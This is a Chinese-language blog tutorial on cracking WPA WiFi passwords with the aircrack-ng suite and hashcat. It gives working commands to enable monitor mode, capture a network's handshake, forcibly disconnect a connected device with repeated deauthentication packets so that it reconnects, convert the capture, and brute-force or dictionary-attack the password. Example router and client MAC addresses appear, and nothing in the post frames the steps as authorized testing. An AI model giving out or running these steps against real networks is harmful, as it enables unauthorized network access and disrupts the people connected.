WIFI 密码 破解字典破解

要破解 WIFI 密码,首先要抓到 WIFI 的握手包,要想得到 WIFI 的握手包,就需要在监听时刚好有设备连接了该 WIFI,但这就需要运气加成,因此可以我们可以主动将该 WIFI 的设备踢下去,一般设备就会自动连接该 WIFI,此时我们就抓到握手包了。

air*-ng 工具套件介绍:
https://www.cnblogs.com/coisini-zheng/p/15841050.html

命令 说明
aircrack-ng 破解WEP以及WPA(字典攻击)密钥
airdecap-ng 通过已知密钥来解密WEP或WPA嗅探数据
airmon-ng 将网卡设定为监听模式
aireplay-ng 数据包注入工具(Linux和Windows使用CommView驱动程序)
airodump-ng 数据包嗅探:将无线网络数据输送到PCAP或IVS文件并显示网络信息
airtun-ng 创建虚拟管道
airolib-ng 保存、管理ESSID密码列表
packetforge-ng 创建数据包注入用的加密包。
Tools 混合、转换工具
airbase-ng 软件模拟AP
airdecloak-ng 消除pcap文件中的WEP加密
airdriver-ng 无线设备驱动管理工具
airolib-ng 保存、管理ESSID密码列表,计算对应的密钥
airserv-ng 允许不同的进程访问无线网卡
buddy-ngeasside-ng 的文件描述
easside-ng 和AP接入点通讯(无WEP)
tkiptun-ng WPA/TKIP攻击
wesside-ng 自动破解WEP密钥
https://cloud.tencent.com/developer/article/1756342?from=15425

抓取 WIFI 握手包
1、将网卡处于监听状态
airmon-ng check
airmon-ng check kill // 关闭影响监听状态的进程
airmon-ng start wlan0
wlan0 是网卡名称,一般都是 wlan0,如果不是则需要根据自己的情况进行修改,可通过 iwconfig 进行查看网卡的名称

当使用 iwconfig 查看网卡名称变为 wlan0mon 说明此时网卡已经处于监听模式了

2、扫描可用 WIFI
airodump-ng wlan0mon

3、获取wifi的握手包
1)扫描设备信息

airodump-ng -c (上一步扫描的 CH ) --bssid (想要破解 WIFI 的 bssid ) -w (握手文件存放目录) wlan0mon
这里以 ssid 为 teamssix 的 WIFI 为例

airodump-ng -c 1 --bssid 5E:C1:1B:A2:37:F1 -w ./ wlan0mon

2)为了顺利得到 WIFI 的握手包,可以将该 WIFI 下的设备强制踢下去

aireplay-ng -0 0 -a (要破解的 wifi 的 bssid ) -c (强制踢下的设备的 MAC 地址) wlan0mon
可以看到 teamssix 这个 WIFI 有一个设备正在连接,该设备的 MAC 地址为:38:26:2C:13:D3:33,使用以下命令可以将其强制踢下去

aireplay-ng -0 0 -a 5E:C1:1B:A2:37:F1 -c 38:26:2C:13:D3:33 wlan0mon
等待设备重新连接后,当右上角出现 WPA handshake 的时候说明获取成功

参数说明:
https://blog.csdn.net/qq_28773223/article/details/128104513

-0 表示端口连接
0 表示断开的次数(0为无数次)
-a 表示要破解的WIFI路由器 (BSSID列)
-c 表示要踢下线的设备(手机终端) (STATION列)

抓包还可以用 CDLinux 下,水滴工具。

  1. 握手包转码
    hashcat 使用的是 hccapx 后缀的文件,而上面的获取到的 是cap后缀文件,所以要转码。
    1)方式一:在线转码, 使用 hashcat 官网提供的在线工具进行格式转换:

https://hashcat.net/cap2hashcat/

会在同目录下生成 1.hccapx 文件

2)方式二:本地工具转码,hashcat-utils-1.9

介绍页:https://hashcat.net/wiki/doku.php?id=hashcat_utils
下载地址:https://github.com/hashcat/hashcat-utils/releases

cap2hccapx 1.cap 1.hccapx
会在同目录下生成 1.hccapx 文件

cap 名字建议使用 MAC地址命名,防止乱

5、破解密码
1)方式一:使用自带的库生成

hashcat -a 3 -m 2500 1.hccapx ?d?d?d?d?d?d?d?d --force
或者

hashcat -a 3 -m 22000 1.hc22000 ?d?d?d?d?d?d?d?d --force

2)方式二:字典破解
https://blog.csdn.net/qq_28773223/article/details/128104513

aircrack-ng -w passwd.txt -b 5E:C1:1B:A2:37:F1 ./test.cap
-w 密码字典
-b 设备的MAC(BSSID)
./test.cap cap文件

在这里插入图片描述

  • 13
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值